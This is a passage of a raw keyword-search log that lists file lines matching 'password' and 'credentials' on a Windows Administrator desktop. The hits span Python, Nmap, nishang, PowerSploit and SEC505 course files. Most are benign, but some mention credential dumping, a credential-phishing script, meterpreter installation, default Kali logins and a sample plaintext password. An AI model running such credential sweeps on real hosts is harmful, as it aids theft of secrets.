813986).\nC:\\Python27\\NEWS.txt:11240:- Added an optional credentials argument to SMTPHandler, for use with\nC:\\Users\\Administrator\\Desktop\\log.txt:12:C:\\Program Files (x86)\\Nmap\\nselib\\data\\enterprise_numbers.txt:42994:43124 PasswordBox Inc.\nC:\\Users\\Administrator\\Desktop\\log.txt:13:C:\\Program Files (x86)\\Nmap\\nselib\\data\\http-folders.txt:563:/password/\nC:\\Users\\Administrator\\Desktop\\log.txt:14:C:\\Program Files (x86)\\Nmap\\nselib\\data\\http-folders.txt:564:/passwords/\nC:\\Users\\Administrator\\Desktop\\log.txt:15:C:\\Program Files (x86)\\Nmap\\nselib\\data\\rtsp-urls.txt:14:/CAM_ID.password.mp2\nC:\\Users\\Administrator\\Desktop\\log.txt:16:C:\\Program Files \n(x86)\\Nmap\\nselib\\data\\rtsp-urls.txt:178:/user=admin_password=tlJwpbo6_channel=1_stream=0.sdp?real_stream\nC:\\Users\\Administrator\\Desktop\\log.txt:17:C:\\Program Files (x86)\\Nmap\\nselib\\data\\tftplist.txt:167:password.bin\nC:\\Users\\Administrator\\Desktop\\log.txt:18:C:\\Program Files (x86)\\Nmap\\nselib\\data\\tftplist.txt:168:password.cfg\nC:\\Users\\Administrator\\Desktop\\log.txt:19:C:\\Program Files (x86)\\Nmap\\nselib\\data\\tftplist.txt:169:password.ini\nC:\\Users\\Administrator\\Desktop\\log.txt:20:C:\\Python27\\NEWS.txt:4376:- Issue #13642: Unquote before b64encoding user:password during Basic\nC:\\Users\\Administrator\\Desktop\\log.txt:21:C:\\Python27\\NEWS.txt:4796: test_tk or test_ttk_guionly under a username that is not currently \nlogged\nC:\\Users\\Administrator\\Desktop\\log.txt:22:C:\\Python27\\NEWS.txt:7185: long passwords. Initial patch by JP St. Pierre.\nC:\\Users\\Administrator\\Desktop\\log.txt:23:C:\\Python27\\NEWS.txt:7749: TLS with authentication credentials.\nC:\\Users\\Administrator\\Desktop\\log.txt:24:C:\\Python27\\NEWS.txt:11063:- Patch #1698: allow '@' in username parsed by urlparse.py.\nC:\\Users\\Administrator\\Desktop\\log.txt:25:C:\\Python27\\NEWS.txt:11144:- When encountering a password-protected robots.txt file the\nC:\\Users\\Administrator\\Desktop\\log.txt:26:C:\\Python27\\NEWS.txt:11145: RobotFileParser no longer prompts interactively for a username and\nC:\\Users\\Administrator\\Desktop\\log.txt:27:C:\\Python27\\NEWS.txt:11146: password (bug 813986).\nC:\\Users\\Administrator\\Desktop\\log.txt:28:C:\\Python27\\NEWS.txt:11240:- Added an optional credentials argument to SMTPHandler, for use with\nC:\\Users\\Administrator\\Desktop\\log.txt:29:nishang-master\\CHANGELOG.txt:32:- Added support for dumping cleartext credentials from RDP \nsessions for Invoke-MimikatzWfigestDowngrade.\nC:\\Users\\Administrator\\Desktop\\log.txt:30:nishang-master\\CHANGELOG.txt:49:- Removed hard coded credentials from Invoke-PSGcat.ps1 and \nInvoke-PSGcat in Powerpreter. So embarrassing!\nC:\\Users\\Administrator\\Desktop\\log.txt:31:nishang-master\\CHANGELOG.txt:74:- Credentials script renamed to Invoke-CredentialsPhish.\nC:\\Users\\Administrator\\Desktop\\log.txt:32:nishang-master\\CHANGELOG.txt:186:- Fixed help in Credentials.ps1\nC:\\Users\\Administrator\\Desktop\\log.txt:33:nishang-master\\CHANGELOG.txt:191:- Fixed a bug in Credentials.ps1\nC:\\Users\\Administrator\\Desktop\\log.txt:34:nishang-master\\CHANGELOG.txt:195:- Credentials payload now validates both local and AD crdentials. \nIf creds entered could not be validated \nC:\\Users\\Administrator\\Desktop\\log.txt:35:locally or at AD, credential prompt is shown again.\nC:\\Users\\Administrator\\Desktop\\log.txt:36:nishang-master\\CHANGELOG.txt:208:- Removed delay in the credentials payload's prompt. Now the \nprompt asking for credentials will keep \nC:\\Users\\Administrator\\Desktop\\log.txt:38:nishang-master\\CHANGELOG.txt:210:- Removed hard coded credentials from Credentials.ps1 :| and \nedited the code to accept user input.\nC:\\Users\\Administrator\\Desktop\\log.txt:39:PowerSploit-master\\Recon\\Dictionaries\\generic.txt:969:password/\nC:\\Users\\Administrator\\Desktop\\log.txt:40:PowerSploit-master\\Recon\\Dictionaries\\generic.txt:970:passwords/\nC:\\Users\\Administrator\\Desktop\\log.txt:41:SEC505-Scripts\\Laptop-Setup-README-NOW.txt:46:Note: The script will reset your password to \n\"P@ssword\" inside the VM.\nC:\\Users\\Administrator\\Desktop\\log.txt:42:SEC505-Scripts\\Day1-PowerShell\\Examples\\signatures.txt:17:iisadmpwd Attempts to \naccess the IIS 4.0 change password scripts \nC:\\Users\\Administrator\\Desktop\\log.txt:44:SEC505-Scripts\\Day1-PowerShell\\Examples\\signatures.txt:47:/\\~.+|\\%2f\\%7e Attempts \nto use a /~ in a request (possible username \nC:\\Users\\Administrator\\Desktop\\log.txt:46:SEC505-Scripts\\Day1-PowerShell\\Misc\\Sample_PowerShell_Transcript_Log.txt:4:Username: \nTESTING\\TestUser47\nC:\\Users\\Administrator\\Desktop\\log.txt:47:SEC505-Scripts\\Day2-Hardening\\IIS\\Log_Analysis\\Signatures.txt:17:iisadmpwd Attempts \nto access the IIS 4.0 change password \nC:\\Users\\Administrator\\Desktop\\log.txt:50:username search).\nC:\\Users\\Administrator\\Desktop\\log.txt:51:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:4:The passwords of local administrative \naccounts should be changed regularly and these \nC:\\Users\\Administrator\\Desktop\\log.txt:52:passwords should be different from one computer to the next. But how can this been done securely \nand conveniently? How can this be done \nC:\\Users\\Administrator\\Desktop\\log.txt:54:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:15:Copy the Update-PasswordArchive.ps1 \nscript into that shared folder (\\\\server\\share).\nC:\\Users\\Administrator\\Desktop\\log.txt:55:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:17:Using Group Policy, SCCM, a third-party \nEMS, SCHTASKS.EXE or some other technique, \nC:\\Users\\Administrator\\Desktop\\log.txt:57:command: \"powershell.exe \\\\server\\share\\update-passwordarchive.ps1 -certificatefilepath \n\\\\server\\share\\cert.cer -passwordarchivepath \nC:\\Users\\Administrator\\Desktop\\log.txt:58:\\\\server\\share -localusername administrator\". This resets the password on the local Administrator \naccount, or whatever account is \nC:\\Users\\Administrator\\Desktop\\log.txt:59:specified, with a 15-25 character, random complex password. The password is encrypted in memory \nwith the public key of the certificate \nC:\\Users\\Administrator\\Desktop\\log.txt:61:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:19:When a password for a computer (laptop47) \nneeds to be recovered, the trusted \nC:\\Users\\Administrator\\Desktop\\log.txt:62:administrator should run from their own local computer the following PowerShell script: \n\"recover-passwordarchive.ps1 -passwordarchivepath \nC:\\Users\\Administrator\\Desktop\\log.txt:63:\\\\server\\share -computername laptop47 -username helpdesk\". This downloads the necessary encrypted \nfiles and decrypts them locally in memory \nC:\\Users\\Administrator\\Desktop\\log.txt:64:using the private key of the administrator, displaying the plaintext password within PowerShell.\nC:\\Users\\Administrator\\Desktop\\log.txt:65:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:26:PowerShell 2.0 or later must be installed \non both the computer with the local user \nC:\\Users\\Administrator\\Desktop\\log.txt:66:account whose password is to be reset and also on the administrators' computers who will recover \nthese passwords in plaintext.\nC:\\Users\\Administrator\\Desktop\\log.txt:67:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:28:The Update-PasswordArchive.ps1 script, \nwhich resets the password, must run with \nC:\\Users\\Administrator\\Desktop\\log.txt:69:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:41:Copy the \\Day2-DAC\\UpdatePasswords folder \nto your hard drive.\nC:\\Users\\Administrator\\Desktop\\log.txt:70:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:43:In File Explorer, double-click the \n\"Password-is-password.pfx\" file to import the \nC:\\Users\\Administrator\\Desktop\\log.txt:71:test certificate and private key into your current user store (accept all the defaults). The \npassword is...password.\nC:\\Users\\Administrator\\Desktop\\log.txt:72:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:45:Open PowerShell with administrative \nprivileges and run this command to reset the \nC:\\Users\\Administrator\\Desktop\\log.txt:73:password on the Guest account:\nC:\\Users\\Administrator\\Desktop\\log.txt:74:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:47: .\\Update-PasswordArchive.ps1 \n-LocalUserName Guest -CertificateFilePath \nC:\\Users\\Administrator\\Desktop\\log.txt:76:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:53:If you open the file in Notepad or a hex \neditor, you'll see that it has been \nC:\\Users\\Administrator\\Desktop\\log.txt:78:user certificate store, hence, you can use your private key to extract the password from the \nencrypted file. Unless hackers have stolen \nC:\\Users\\Administrator\\Desktop\\log.txt:79:your private key, they will not be able to decrypt the file and obtain the password inside it.\nC:\\Users\\Administrator\\Desktop\\log.txt:80:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:55:To obtain the plaintext password, run \nthis command:\nC:\\Users\\Administrator\\Desktop\\log.txt:81:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:57: .\\Recover-PasswordArchive.ps1 \n-ComputerName $env:computername -UserName Guest\nC:\\Users\\Administrator\\Desktop\\log.txt:82:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:59:The output is an object with the \nplaintext password and other properties, similar \nC:\\Users\\Administrator\\Desktop\\log.txt:84:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:63: UserName : Guest\nC:\\Users\\Administrator\\Desktop\\log.txt:85:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:68: Password : b4EAti!HiLX]QI2\nC:\\Users\\Administrator\\Desktop\\log.txt:86:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:70:The password property can now be piped \ninto other commands or copied into the \nC:\\Users\\Administrator\\Desktop\\log.txt:88:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:74: get-help -full \n.\\Update-PasswordArchive.ps1 \nC:\\Users\\Administrator\\Desktop\\log.txt:89:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:81:The password is never sent over the \nnetwork in plaintext, never saved to disk in \nC:\\Users\\Administrator\\Desktop\\log.txt:90:plaintext, and never exposed as a command-line argument, either when resetting the password or \nwhen recovering it later. The new password \nC:\\Users\\Administrator\\Desktop\\log.txt:91:is generated randomly in the memory of the PowerShell process running on the computer where the \npassword is reset. The process runs for \nC:\\Users\\Administrator\\Desktop\\log.txt:93:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:83:Different certificates can be used at \ndifferent times, as long as their private \nC:\\Users\\Administrator\\Desktop\\log.txt:94:keys are available to the administrator. When recovering a password, the correct certificate and \nprivate key will be used automatically. A \nC:\\Users\\Administrator\\Desktop\\log.txt:96:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:85:If the shared folder is not accessible to \nthe computer when the scheduled job runs, \nC:\\Users\\Administrator\\Desktop\\log.txt:97:the password is not reset.\nC:\\Users\\Administrator\\Desktop\\log.txt:98:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:87:If multiple administrators must be able \nto recover the plaintext passwords, export \nC:\\Users\\Administrator\\Desktop\\log.txt:102:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:91:The update script writes to the \nApplication event log whenever and wherever the \nC:\\Users\\Administrator\\Desktop\\log.txt:103:script is run (Source: PasswordArchive, Event ID: 9013).\nC:\\Users\\Administrator\\Desktop\\log.txt:104:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:93:The script can only be used to reset the \npasswords of local accounts, not domain \nC:\\Users\\Administrator\\Desktop\\log.txt:106:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:100:Keep the private key for the \ncertificate used to encrypt the password archive \nC:\\Users\\Administrator\\Desktop\\log.txt:108:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:102:If the private key for the certificate \nis compromised, create a new key pair, \nC:\\Users\\Administrator\\Desktop\\log.txt:110:Policy, SCHTASKS.EXE or some other technique. Once all passwords have been changed, the fact \nthat the old private key has been compromised \nC:\\Users\\Administrator\\Desktop\\log.txt:111:does not mean any current passwords are known. \nC:\\Users\\Administrator\\Desktop\\log.txt:112:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:104:Use an RSA public key which is 2048 \nbits or larger. The public key encrypts a \nC:\\Users\\Administrator\\Desktop\\log.txt:113:random 256-bit Rijndael key, which encrypts the password. Every file has a different Rijndael \nkey. RSA and Rijndael are used for maximum \nC:\\Users\\Administrator\\Desktop\\log.txt:115:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:106:Prevent modification of the \nUpdate-PasswordArchive.ps1 script itself by digitally \nC:\\Users\\Administrator\\Desktop\\log.txt:118:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:108:Attackers may try to corrupt or delete \nthe existing password archive files to \nC:\\Users\\Administrator\\Desktop\\log.txt:119:prevent access to current passwords. Each archive file contains an encrypted SHA256 hash of the \nusername, computername and password in that \nC:\\Users\\Administrator\\Desktop\\log.txt:120:file in order to detect modified or damaged bits; the hash is checked whenever a password is \nrecovered. \nC:\\Users\\Administrator\\Desktop\\log.txt:121:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:127:An attacker might try to generate \nmillions of spoofed archive files and add them \nC:\\Users\\Administrator\\Desktop\\log.txt:126:machines. Besides, the benefit to us of managing local administrative account passwords \ncorrectly far exceeds the potential negative of \nC:\\Users\\Administrator\\Desktop\\log.txt:128:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:136:The output of the \nRecover-PasswordArchive.ps1 script can be piped into other \nC:\\Users\\Administrator\\Desktop\\log.txt:129:scripts to automate other tasks which require the plaintext password, such as executing commands, \ndoing WMI queries, opening an RDP session, \nC:\\Users\\Administrator\\Desktop\\log.txt:130:or immediately resetting the password again when finished.\nC:\\Users\\Administrator\\Desktop\\log.txt:131:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:138:When recovering a password, you can \npipe the password into the built-in clip.exe \nC:\\Users\\Administrator\\Desktop\\log.txt:132:utility to put the password into the clipboard, like this:\nC:\\Users\\Administrator\\Desktop\\log.txt:133:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:140: \n\\\\controller\\password-archives\\Recover-PasswordArchive.ps1 `\nC:\\Users\\Administrator\\Desktop\\log.txt:134:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:141: -PasswordArchivePath \n\\\\controller\\password-archives -ComputerName laptop47 ` \nC:\\Users\\Administrator\\Desktop\\log.txt:135:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:142: -UserName Administrator | \nselect-object -expandproperty password | clip.exe\nC:\\Users\\Administrator\\Desktop\\log.txt:136:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:144:Keep the number of files in the archive \nfolder manageable by using the \nC:\\Users\\Administrator\\Desktop\\log.txt:137:CleanUp-PasswordArchives.ps1 script. Perhaps running this script as a scheduled job every two or \nfour weeks.\nC:\\Users\\Administrator\\Desktop\\log.txt:138:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:146:To optimize the performance of the \nRecover-PasswordArchive.ps1 script when there \nC:\\Users\\Administrator\\Desktop\\log.txt:139:are more than 100,000 files in the folder containing the password archives, disable 8.3 file name \ngeneration and strip all current 8.3 names \nC:\\Users\\Administrator\\Desktop\\log.txt:141:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:150:You can also perform an immediate \npassword update with commands wrapped in a \nC:\\Users\\Administrator\\Desktop\\log.txt:143:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:153: Invoke-Command -ComputerName \nlaptop47 -filepath .\\Update-PasswordArchive.ps1 \nC:\\Users\\Administrator\\Desktop\\log.txt:145:SEC505-Scripts\\Day4-Admins\\UpdatePasswords\\README.txt:158:The above Invoke-Command can be done by \nspecifying UNC paths instead, but this \nC:\\Users\\Administrator\\Desktop\\log.txt:146:requires delegation of credentials to the remote computer, which is not ideal for limiting token \nabuse attacks, so the certificate and \nC:\\Users\\Administrator\\Desktop\\log.txt:148:SEC505-Scripts\\Day6-Servers\\Event_Log_ID_Numbers.txt:23:529 = Logon Failure: Unknown user name or \nbad password\nC:\\Users\\Administrator\\Desktop\\log.txt:149:SEC505-Scripts\\Day6-Servers\\Event_Log_ID_Numbers.txt:29:535 = The specified account's password \nhas expired\nC:\\Users\\Administrator\\Desktop\\log.txt:150:SEC505-Scripts\\Day6-Servers\\Event_Log_ID_Numbers.txt:72:627 = Change Password Attempt\nC:\\Users\\Administrator\\Desktop\\log.txt:151:SEC505-Scripts\\Day6-Servers\\Event_Log_ID_Numbers.txt:73:628 = User Account password set\nC:\\Users\\Administrator\\Desktop\\log.txt:152:SEC505-Scripts\\Day6-Servers\\Kali-Linux-CheatSheet.txt:6:Default username is \"root\", password is \n\"toor\".\nC:\\Users\\Administrator\\Desktop\\log.txt:153:SEC505-Scripts\\Day6-Servers\\Kali-Linux-CheatSheet.txt:63: Password, User and Group Management\nC:\\Users\\Administrator\\Desktop\\log.txt:154:SEC505-Scripts\\Day6-Servers\\Kali-Linux-CheatSheet.txt:65:passwd \nC:\\Users\\Administrator\\Desktop\\log.txt:155:SEC505-Scripts\\Day6-Servers\\Kali-Linux-CheatSheet.txt:67:id []\nC:\\Users\\Administrator\\Desktop\\log.txt:156:SEC505-Scripts\\Day6-Servers\\Kali-Linux-CheatSheet.txt:69:adduser \nC:\\Users\\Administrator\\Desktop\\log.txt:157:SEC505-Scripts\\Day6-Servers\\Kali-Linux-CheatSheet.txt:70:deluser \nC:\\Users\\Administrator\\Desktop\\log.txt:158:SEC505-Scripts\\Day6-Servers\\Kali-Linux-CheatSheet.txt:139:smbclient -U -W \n//server/share\nC:\\Users\\Administrator\\Desktop\\log.txt:159:SEC505-Scripts\\Day6-Servers\\Kali-Linux-CheatSheet.txt:140:smbclient -U -W \n//server/share \"\"\nC:\\Users\\Administrator\\Desktop\\log.txt:160:SEC505-Scripts\\Day6-Servers\\Kali-Linux-CheatSheet.txt:245:# To install meterpreter with a \nusername and password/hash:\nC:\\Users\\Administrator\\Desktop\\log.txt:161:SEC505-Scripts\\Day6-Servers\\Kerberos\\License.txt:14:MEMBER ACCOUNT, PASSWORD, AND SECURITY\nC:\\Users\\Administrator\\Desktop\\log.txt:162:SEC505-Scripts\\Day6-Servers\\Kerberos\\License.txt:56:MEMBER ACCOUNT, PASSWORD, AND SECURITY\nC:\\Users\\Administrator\\Desktop\\log.txt:165:are entirely responsible for maintaining the confidentiality of your password and account. \nFurthermore, you are entirely responsible for any \nC:\\Users\\Administrator\\Desktop\\log.txt:167:other breach of security. Microsoft will not be liable for any loss that you may incur as a \nresult of someone else using your password or \nC:\\Users\\Administrator\\Desktop\\log.txt:169:someone else using your account or password. You may not use anyone else's account without the \npermission of the account holder. \nC:\\Users\\Administrator\\Desktop\\log.txt:174:connected to any Microsoft server or to any of the Services, through hacking, password mining or \nany other means. You may not obtain or \nC:\\Users\\Administrator\\Desktop\\log.txt:176:SEC505-Scripts\\Day6-Servers\\Kerberos\\README.txt:1:This folder contains a PowerShell script to \nreset the password of\nC:\\Users\\Administrator\\Desktop\\log.txt:177:SEC505-Scripts\\Extras\\VBScript\\passwords.txt:1:password\nC:\\Users\\Administrator\\Desktop\\log.txt:178:SEC505-Scripts\\Extras\\VBScript\\signatures.txt:17:iisadmpwd attempts to access the \nIIS 4.0 change password scripts \nC:\\Users\\Administrator\\Desktop\\log.txt:180:SEC505-Scripts\\Extras\\VBScript\\signatures.txt:47:/\\~.+|\\%2f\\%7e attempts to use a \n/~ in a request (possible username search).\nC:\\Users\\Administrator\\Desktop\\log.txt:182:Sysinternals tools may include personally identifiable or other sensitive information (such as \nusernames, passwords, paths to files \nC:\\Users\\Administrator\\Desktop\\log.txt:185:SysinternalsSuite\\readme.txt:18:Autologon - Bypass password screen during logon.\nC:\\Users\\Administrator\\Desktop\\log.txt:186:SysinternalsSuite\\readme.txt:102:PsPasswd - Changes account passwords.\nC:\\Users\\Administrator\\Desktop\\log.txt:187:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Automatic_Variables.help.txt:109: \ntypically C:\\Users\\.\nC:\\Users\\Administrator\\Desktop\\log.txt:188:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Functions_Advanced_Parameters.help.txt:181:\n parameter set, a UserName \nC:\\Users\\Administrator\\Desktop\\log.txt:190:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Functions_Advanced_Parameters.help.txt:194:\n $UserName,\nC:\\Users\\Administrator\\Desktop\\log.txt:191:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Functions_Advanced_Parameters.help.txt:220:\n $UserName,\nC:\\Users\\Administrator\\Desktop\\log.txt:192:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Functions_Advanced_Parameters.help.txt:561:\n $UserName\nC:\\Users\\Administrator\\Desktop\\log.txt:193:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Functions_OutputTypeAttribute.help.txt:133:\n $UserName\nC:\\Users\\Administrator\\Desktop\\log.txt:195:credentials. It\nC:\\Users\\Administrator\\Desktop\\log.txt:196:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Jobs.help.txt:305: credentials to run \nthe command. The value of the Reason \nC:\\Users\\Administrator\\Desktop\\log.txt:198:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Language_Modes.help.txt:172: \nPSCredential\nC:\\Users\\Administrator\\Desktop\\log.txt:199:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Pipelines.help.txt:367: \nParameter [Credential] PIPELINE INPUT \nC:\\Users\\Administrator\\Desktop\\log.txt:201:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Preference_Variables.help.txt:1084: \n ProxyCredential :\nC:\\Users\\Administrator\\Desktop\\log.txt:203:credentials of a member of \nC:\\Users\\Administrator\\Desktop\\log.txt:204:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_PSSession_Details.help.txt:142: only if \nyou can supply the credentials of the user \nC:\\Users\\Administrator\\Desktop\\log.txt:206:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_PSSession_Details.help.txt:144: \nincludes RunAs credentials. Otherwise, you can \nC:\\Users\\Administrator\\Desktop\\log.txt:209:credentials that were used \nC:\\Users\\Administrator\\Desktop\\log.txt:211:credentials of\nC:\\Users\\Administrator\\Desktop\\log.txt:212:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_FAQ.help.txt:63: name and \npassword credentials on the local computer or the \nC:\\Users\\Administrator\\Desktop\\log.txt:213:credentials\nC:\\Users\\Administrator\\Desktop\\log.txt:214:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_FAQ.help.txt:65: The credentials \nand the rest of the transmission are \nC:\\Users\\Administrator\\Desktop\\log.txt:216:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_FAQ.help.txt:513: to use the \nCredential parameter of the Invoke-Command, \nC:\\Users\\Administrator\\Desktop\\log.txt:218:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_FAQ.help.txt:514: or \nEnter-PSSession cmdlets to provide the credentials of \nC:\\Users\\Administrator\\Desktop\\log.txt:220:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_FAQ.help.txt:521: credentials.\nC:\\Users\\Administrator\\Desktop\\log.txt:221:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Requirements.help.txt:62: \nprovide the credentials of an administrator. \nC:\\Users\\Administrator\\Desktop\\log.txt:223:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:273: \nHOW TO PROVIDE ADMINISTRATOR CREDENTIALS \nC:\\Users\\Administrator\\Desktop\\log.txt:224:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:279: \ncomputer. Credentials are sometimes required \nC:\\Users\\Administrator\\Desktop\\log.txt:226:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:283: \ncomputer, or can provide the credentials of a \nC:\\Users\\Administrator\\Desktop\\log.txt:228:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:284: \ngroup, use the Credential parameter of the \nC:\\Users\\Administrator\\Desktop\\log.txt:231:the credentials of an\nC:\\Users\\Administrator\\Desktop\\log.txt:233:-Credential Domain01\\Admin01\nC:\\Users\\Administrator\\Desktop\\log.txt:234:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:292: \nFor more information about the Credential \nC:\\Users\\Administrator\\Desktop\\log.txt:236:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:374: 2. \nUse the Credential parameter in all remote \nC:\\Users\\Administrator\\Desktop\\log.txt:239:submitting the credentials\nC:\\Users\\Administrator\\Desktop\\log.txt:240:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:400: 2. \nVerify that a password is set on the \nC:\\Users\\Administrator\\Desktop\\log.txt:242:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:401: \npassword is not set or the password value \nC:\\Users\\Administrator\\Desktop\\log.txt:244:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:404: \nTo set password for your user account, use \nC:\\Users\\Administrator\\Desktop\\log.txt:246:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:408: 3. \nUse the Credential parameter in all remote \nC:\\Users\\Administrator\\Desktop\\log.txt:249:submitting the credentials\nC:\\Users\\Administrator\\Desktop\\log.txt:250:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Remote_Troubleshooting.help.txt:544: \n -- ProxyCredential\nC:\\Users\\Administrator\\Desktop\\log.txt:252:ProxyAuthentication, and ProxyCredential\nC:\\Users\\Administrator\\Desktop\\log.txt:254:-ProxyCredential Domain01\\User01\nC:\\Users\\Administrator\\Desktop\\log.txt:255:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Return.help.txt:44: function \nScreenPassword($instance)\nC:\\Users\\Administrator\\Desktop\\log.txt:257:ScreenPassword($a) }\nC:\\Users\\Administrator\\Desktop\\log.txt:258:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Return.help.txt:53: This script \nchecks each user account. The ScreenPassword \nC:\\Users\\Administrator\\Desktop\\log.txt:261:password-protected \nC:\\Users\\Administrator\\Desktop\\log.txt:262:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Return.help.txt:55: screen saver. If \nthe screen saver is password protected, the \nC:\\Users\\Administrator\\Desktop\\log.txt:264:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Scopes.help.txt:529: $Cred = \nGet-Credential\nC:\\Users\\Administrator\\Desktop\\log.txt:265:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Scopes.help.txt:530: \nInvoke-Command $s {Remove-Item .\\Test*.ps1 -Credential \nC:\\Users\\Administrator\\Desktop\\log.txt:267:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Scopes.help.txt:537: $Cred = \nGet-Credential\nC:\\Users\\Administrator\\Desktop\\log.txt:269:-Credential $c} -ArgumentList $Cred \nC:\\Users\\Administrator\\Desktop\\log.txt:270:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Script_Internationalization.help.txt:157:if\n (!($username)) { $msgTable.promptMsg } \nC:\\Users\\Administrator\\Desktop\\log.txt:272:can supply the credentials of a\nC:\\Users\\Administrator\\Desktop\\log.txt:273:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Session_Configuration_Files.help.txt:230: \n RunAsPassword \nC:\\Users\\Administrator\\Desktop\\log.txt:274:NoteProperty System.String RunAsPassword=\nC:\\Users\\Administrator\\Desktop\\log.txt:276:password. The \nC:\\Users\\Administrator\\Desktop\\log.txt:277:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:174: password ensures \nthat no one can use or access the \nC:\\Users\\Administrator\\Desktop\\log.txt:279:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:175: your consent. \nCreate and enter a password that you can \nC:\\Users\\Administrator\\Desktop\\log.txt:281:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:176: use this password \nlater to retrieve the certificate.\nC:\\Users\\Administrator\\Desktop\\log.txt:282:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:277: 6. Type a \npassword, and then type it again to confirm.\nC:\\Users\\Administrator\\Desktop\\log.txt:283:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\about_Signing.help.txt:293: 4. On the \nPassword page, select \"Enable strong private 